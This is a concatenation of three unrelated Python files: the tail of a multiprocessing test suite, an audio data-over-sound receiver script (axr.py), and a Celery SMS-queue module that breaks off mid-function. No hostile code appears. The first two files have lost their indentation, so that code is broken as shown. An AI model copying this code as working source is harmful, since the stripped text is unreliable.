r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
axr.py | #!/usr/bin/env python3
import sys
import time
import struct
import threading
import subprocess as sp
def eprint(*a, **ka):
ka["file"] = sys.stderr
print(*a, **ka)
class A(object):
def __init__(self, nch, profile):
self.nch = nch
self.profile = profile
self.dec = []
self.emitted = 0
self.procs_alive = self.nch
self.mutex = threading.Lock()
def rd(self, ch, p):
# eprint(ch)
padding = True
# with open(f"{ch}.rd", "wb") as f:
if True:
while True:
buf = p.stdout.read(256)
# eprint(ch, len(buf))
if not buf:
break
if padding:
buf = buf.lstrip(b"\x00")
if buf.startswith(b"\xff"):
padding = False
buf = buf[1:]
else:
continue
# f.write(buf)
with self.mutex:
self.dec[ch] += buf
with self.mutex:
self.procs_alive -= 1
def emit(self):
# check for complete frames to emit
szs = []
with self.mutex:
for n, buf in enumerate(self.dec):
if len(buf) < 4:
return False
magic, sz = struct.unpack(">HH", buf[:4])
if magic != 0xCADE:
if not sz:
return False
m = f"axr: FATAL: desync @ sample {self.emitted} ch{n} magic {magic:04x} sz {sz} hex {sz:04x}"
eprint(m)
try:
eprint("\\x" + buf[:64].hex(" ").replace(" ", "\\x"))
except Exception as ex:
eprint(buf[:64].hex())
eprint(ex)
sys.exit(1)
if len(buf) < sz + 4:
return False
szs.append(sz)
bufs = [x[4 : sz + 4] for x, sz in zip(self.dec, szs)]
self.dec = [x[sz + 4 :] for x, sz in zip(self.dec, szs)]
if not bufs[0]:
return False
for n in range(1, len(bufs)):
if len(bufs[n]) < len(bufs[n - 1]):
eprint(f"axr: WARNING: ch{n} shorter than ch0")
bufs[n] += b"\x00" * 4
# mux and write
dec = [y for x in zip(*bufs) for y in x]
dec = struct.pack(f"{len(dec)}B", *dec)[: sum(szs)]
sys.stdout.buffer.write(dec)
# eprint("emit", len(dec))
self.emitted += len(bufs[0])
return True
def run(self):
# 1ch f32le 44k1
header = b"RIFFH\x0f<\x1eWAVEfmt \x10\x00\x00\x00\x03\x00\x01\x00D\xac\x00\x00\x10\xb1\x02\x00\x04\x00 \x00fact\x04\x00\x00\x00\xc0\x03\x8f\x07PEAK\x10\x00\x00\x00\x01\x00\x00\x00\xd6\xe0\x1d^\x84\x121<O6\xdf\x04data\x00\x0f<\x1e\xe4^\xd25\xd5\xd0?\xb6k\x92a68s5\xb6"
procs = []
# fds = [open(f"{n}.rp", "wb") for n in range(self.nch)]
for ch in range(self.nch):
self.dec.append(b"")
cmd = ["./quiet-decode", self.profile, "/dev/stdin"]
p = sp.Popen(cmd, stdin=sp.PIPE, stdout=sp.PIPE)
threading.Thread(target=self.rd, args=(ch, p), daemon=True).start()
p.stdin.write(header)
procs.append(p)
rem = b""
vhist = []
runtime = 0
while True:
buf = sys.stdin.buffer.read(65535)
if not buf:
break
buf = rem + buf
n = len(buf) % (self.nch * 4)
if n:
rem = buf[-n:]
buf = buf[:-n]
else:
rem = b""
buf = [x[0] for x in struct.iter_unpack("f", buf)]
peak = max(max(buf), abs(min(buf)))
vhist = vhist[-5:] + [peak]
vol = max(vhist)
eprint(f" VOL {int(vol * 100)} %\n\033[A", end="")
for n in range(self.nch):
b = buf[n :: self.nch]
b = struct.pack(f"{len(b)}f", *b) # funfact: lossless
# fds[n].write(b)
procs[n].stdin.write(b)
self.emit()
if peak > 0.1:
runtime += 1
elif vol < 0.1 and runtime > 4:
eprint("axr: INFO: input went silent; exiting")
break
for p in procs:
p.stdin.close()
spins = 0
while True:
if self.emit():
spins = 0
continue
time.sleep(0.02)
spins += 1
if spins > 20:
break
def main():
nch = 2 # stereo
profile = "w"
A(nch, profile).run()
if __name__ == "__main__":
main()
# f() { printf '%s\n' "$1" | tee v1 | ~/dev/diodes/ax/axt.py | tee pcm | ~/dev/diodes/ax/axr.py | tee v2; cat v1; cmp v1 v2 && return 0; hexdump -C v1; hexdump -C v2; return 1; }
# s=''; for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do s=$s$c; f $s || break; done
#
# (for ((a=1; a<255; a++)); do x=$(printf '\\x%02x' $a); printf "$x$x$x$x"; head -c 124 /dev/zero; done) | tee v1 | ~/dev/diodes/ax/axt.py | tee pcm | ~/dev/diodes/ax/axr.py > v2; cmp v1 v2
#
# p=w; (cat dbg/header-44khz.wav; cat ~/Videos/dashcam.webm | ./quiet-encode $p) | tee pcm | ffmpeg -re -v warning -ar 96000 -f f32le -i - -f f32le - -filter_complex "[a:0]showspectrum=s=1024x576:fps=30:legend=1:slide=scroll:color=intensity:fscale=lin:orientation=horizontal,crop=1280:640,format=yuv420p[vo]" -map "[vo]" -f sdl - | ./quiet-decode $p /dev/stdin | pv -Wapterbi 0.5 | cmp ~/Videos/dashcam.webm
#
# ./axt.py <"$f" | tee pcm | ffmpeg -re -v warning -ar 96000 -ac 2 -f f32le -i - -f f32le - -filter_complex "[a:0]showspectrum=s=1024x576:fps=30:legend=1:slide=scroll:color=intensity:fscale=lin:orientation=horizontal,crop=1280:640,format=yuv420p[vo]" -map "[vo]" -f sdl - | ./axr.py | pv -Wapterbi 0.5 | cmp "$f"
#
# ./axt.py <"$f" | ./axr.py | pv -apterbi 0.5 | tee f2 | cmp "$f"
|
tasks.py | import math
import pytz
import logging
from datetime import datetime, timedelta
from celery.task import task
from time import sleep
from redis_cache.cache import RedisCache
from corehq.apps.sms.mixin import SMSLoadBalancingMixin
from corehq.apps.sms.models import SMSLog, OUTGOING, INCOMING
from corehq.apps.sms.api import send_message_via_backend, process_incoming
from django.conf import settings
from corehq.apps.domain.models import Domain
from corehq.apps.smsbillables.models import SmsBillable
from dimagi.utils.timezones import utils as tz_utils
from dimagi.utils.couch.cache import cache_core
from threading import Thread
ERROR_TOO_MANY_UNSUCCESSFUL_ATTEMPTS = "TOO_MANY_UNSUCCESSFUL_ATTEMPTS"
ERROR_MESSAGE_IS_STALE = "MESSAGE_IS_STALE"
ERROR_INVALID_DIRECTION = "INVALID_DIRECTION"
def set_error(msg, system_error_message=None):
    """Flag *msg* as errored, record an optional reason code, and persist it."""
    msg.system_error_message = system_error_message
    msg.error = True
    msg.save()
def handle_unsuccessful_processing_attempt(msg):
    """Bump the attempt counter; requeue with a delay, or give up for good
    once the configured maximum number of attempts is reached."""
    msg.num_processing_attempts += 1
    if msg.num_processing_attempts >= settings.SMS_QUEUE_MAX_PROCESSING_ATTEMPTS:
        set_error(msg, ERROR_TOO_MANY_UNSUCCESSFUL_ATTEMPTS)
    else:
        delay_processing(msg, settings.SMS_QUEUE_REPROCESS_INTERVAL)
def handle_successful_processing_attempt(msg):
    """Mark *msg* as processed now; outgoing messages also get their
    send date stamped with the same timestamp."""
    now = datetime.utcnow()
    msg.num_processing_attempts += 1
    msg.processed = True
    msg.processed_timestamp = now
    if msg.direction == OUTGOING:
        msg.date = now
    msg.save()
def delay_processing(msg, minutes):
    """Push the message's scheduled processing time *minutes* into the
    future and persist the change."""
    msg.datetime_to_process = msg.datetime_to_process + timedelta(minutes=minutes)
    msg.save()
def get_lock(client, key):
    """Return a redis lock on *key*; the configured timeout is in minutes,
    while client.lock() expects seconds."""
    timeout_seconds = settings.SMS_QUEUE_PROCESSING_LOCK_TIMEOUT * 60
    return client.lock(key, timeout=timeout_seconds)
def time_within_windows(domain_now, windows):
    """Return True if *domain_now* falls inside any of the given windows.

    A window matches when its day equals the current weekday (or is -1,
    meaning "any day") and the current time lies within its optional
    [start_time, end_time] bounds (an unset bound is unbounded).
    """
    weekday = domain_now.weekday()
    now = domain_now.time()
    return any(
        (w.day in (weekday, -1))
        and (w.start_time is None or now >= w.start_time)
        and (w.end_time is None or now <= w.end_time)
        for w in windows
    )
def handle_domain_specific_delays(msg, domain_object, utcnow):
    """
    Checks whether or not we need to hold off on sending an outbound message
    due to any restrictions set on the domain, and delays processing of the
    message if necessary.
    Returns True if a delay was made, False if not.
    """
    domain_now = tz_utils.adjust_datetime_to_timezone(
        utcnow, pytz.utc.zone, domain_object.default_timezone)

    # Domain-wide "do not send" windows.
    restricted = domain_object.restricted_sms_times
    if restricted and not time_within_windows(domain_now, restricted):
        delay_processing(msg, settings.SMS_QUEUE_DOMAIN_RESTRICTED_RETRY_INTERVAL)
        return True

    # Hold automated (non-chat) messages briefly while a two-way SMS
    # conversation with this recipient appears to be in progress.
    conversation_times = domain_object.sms_conversation_times
    if msg.chat_user_id is None and conversation_times:
        if time_within_windows(domain_now, conversation_times):
            window_start = utcnow - timedelta(
                minutes=domain_object.sms_conversation_length)
            if SMSLog.inbound_entry_exists(msg.couch_recipient_doc_type,
                                           msg.couch_recipient,
                                           window_start,
                                           utcnow):
                delay_processing(msg, 1)
                return True

    return False
def message_is_stale(msg, utcnow):
    """A message is stale when its date is missing/not a datetime, or is
    older than the configured cutoff."""
    cutoff = utcnow - timedelta(hours=settings.SMS_QUEUE_STALE_MESSAGE_DURATION)
    if not isinstance(msg.date, datetime):
        return True
    return msg.date < cutoff
def _wait_and_release_lock(lock, timeout, start_timestamp):
while (datetime.utcnow() - start_timestamp) < timedelta(seconds=timeout):
sleep(0.1)
try:
lock.release()
except:
# The lock could have timed out in the meantime
pass
def wait_and_release_lock(lock, timeout):
    """Release *lock* after *timeout* seconds without blocking the caller
    (the waiting happens in a daemonless background thread)."""
    started_at = datetime.utcnow()
    worker = Thread(target=_wait_and_release_lock,
                    args=(lock, timeout, started_at))
    worker.start()
def handle_outgoing(msg):
    """
    Should return a requeue flag, so if it returns True, the message will be
    requeued and processed again immediately, and if it returns False, it will
    not be queued again.
    """
    def onerror():
        logging.exception("Exception while processing SMS %s" % msg._id)
    backend = msg.outbound_backend
    sms_interval = backend.get_sms_interval()
    # Rate limiting applies only when the backend defines an SMS interval.
    use_rate_limit = sms_interval is not None
    # Load balancing applies only when there is more than one number to
    # rotate through.
    use_load_balancing = (isinstance(backend, SMSLoadBalancingMixin) and
        len(backend.phone_numbers) > 1)
    # Redis state is only needed for rate limiting / load balancing.
    if use_rate_limit or use_load_balancing:
        client = cache_core.get_redis_client()
    lbi = None
    orig_phone_number = None
    if use_load_balancing:
        lbi = backend.get_next_phone_number(client)
        orig_phone_number = lbi.phone_number
    elif (isinstance(backend, SMSLoadBalancingMixin) and
        len(backend.phone_numbers) == 1):
        # If there's only one phone number, we don't need to go through the
        # load balancing algorithm. But we should always pass an
        # orig_phone_number if it's an instance of SMSLoadBalancingMixin.
        orig_phone_number = backend.phone_numbers[0]
    if use_rate_limit:
        # One rate-limit lock per backend, or per (backend, phone) pair
        # when load balancing.
        if use_load_balancing:
            lock_key = "sms-backend-%s-rate-limit-phone-%s" % (backend._id,
                lbi.phone_number)
        else:
            lock_key = "sms-backend-%s-rate-limit" % backend._id
        lock = client.lock(lock_key, timeout=30)
    if not use_rate_limit or (use_rate_limit and lock.acquire(blocking=False)):
        if use_load_balancing:
            lbi.finish(save_stats=True)
        result = send_message_via_backend(msg, backend=backend,
            orig_phone_number=orig_phone_number, onerror=onerror)
        if use_rate_limit:
            # Hold the rate-limit lock for sms_interval seconds in a
            # background thread, then release it.
            wait_and_release_lock(lock, sms_interval)
        if result:
            handle_successful_processing_attempt(msg)
        else:
            handle_unsuccessful_processing_attempt(msg)
        return False
    else:
        # We're using rate limiting, but couldn't acquire the lock, so
        # another thread is sending sms with this backend. Rather than wait,
        # we'll just put this message at the back of the queue.
        if use_load_balancing:
            lbi.finish(save_stats=False)
        return True
def handle_incoming(msg):
    """Process an inbound SMS, recording success or failure on the message."""
    try:
        process_incoming(msg)
        handle_successful_processing_attempt(msg)
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt
        # still propagate; any processing error marks an attempt as failed.
        logging.exception("Exception while processing SMS %s" % msg._id)
        handle_unsuccessful_processing_attempt(msg)
@task(queue="sms_queue")
def process_sms(message_id):
    """
    message_id - _id of an SMSLog entry

    Dequeues and processes a single queued SMS. A redis message lock guards
    against duplicate processing of the same message, and a per-recipient
    lock serializes inbound messages from a single contact.
    """
    # Note that Redis error/exception notifications go out from the
    # run_sms_queue command, so no need to send them out here
    # otherwise we'd get too many emails.
    rcache = cache_core.get_redis_default_cache()
    if not isinstance(rcache, RedisCache):
        return
    try:
        client = rcache.raw_client
    except NotImplementedError:
        return
    utcnow = datetime.utcnow()
    # Prevent more than one task from processing this SMS, just in case
    # the message got enqueued twice.
    message_lock = get_lock(client, "sms-queue-processing-%s" % message_id)
    if message_lock.acquire(blocking=False):
        msg = SMSLog.get(message_id)
        if message_is_stale(msg, utcnow):
            set_error(msg, ERROR_MESSAGE_IS_STALE)
            message_lock.release()
            return
        if msg.direction == OUTGOING:
            # Outbound messages may need to wait for domain-level
            # restricted/conversation time windows.
            domain_object = Domain.get_by_name(msg.domain, strict=True)
            if handle_domain_specific_delays(msg, domain_object, utcnow):
                message_lock.release()
                return
        requeue = False
        # Process inbound SMS from a single contact one at a time
        recipient_block = msg.direction == INCOMING
        if (isinstance(msg.processed, bool)
            and not msg.processed
            and not msg.error
            and msg.datetime_to_process < utcnow):
            if recipient_block:
                recipient_lock = get_lock(client,
                    "sms-queue-recipient-phone-%s" % msg.phone_number)
                recipient_lock.acquire(blocking=True)
            if msg.direction == OUTGOING:
                requeue = handle_outgoing(msg)
            elif msg.direction == INCOMING:
                handle_incoming(msg)
            else:
                set_error(msg, ERROR_INVALID_DIRECTION)
            if recipient_block:
                recipient_lock.release()
        message_lock.release()
        if requeue:
            # handle_outgoing asked for an immediate retry (e.g. the
            # backend's rate-limit lock was held by another worker).
            process_sms.delay(message_id)
@task
def store_billable(msg):
    """Create SmsBillable records for *msg*, one per SMS segment.

    Latin-1-encodable text fits 160 characters per segment; text containing
    other unicode characters is limited to 70 characters per segment.
    """
    if msg._id and not SmsBillable.objects.filter(log_id=msg._id).exists():
        try:
            msg.text.encode('iso-8859-1')
            msg_length = 160
        except UnicodeEncodeError:
            # This string contains unicode characters, so the allowed
            # per-sms message length is shortened
            msg_length = 70
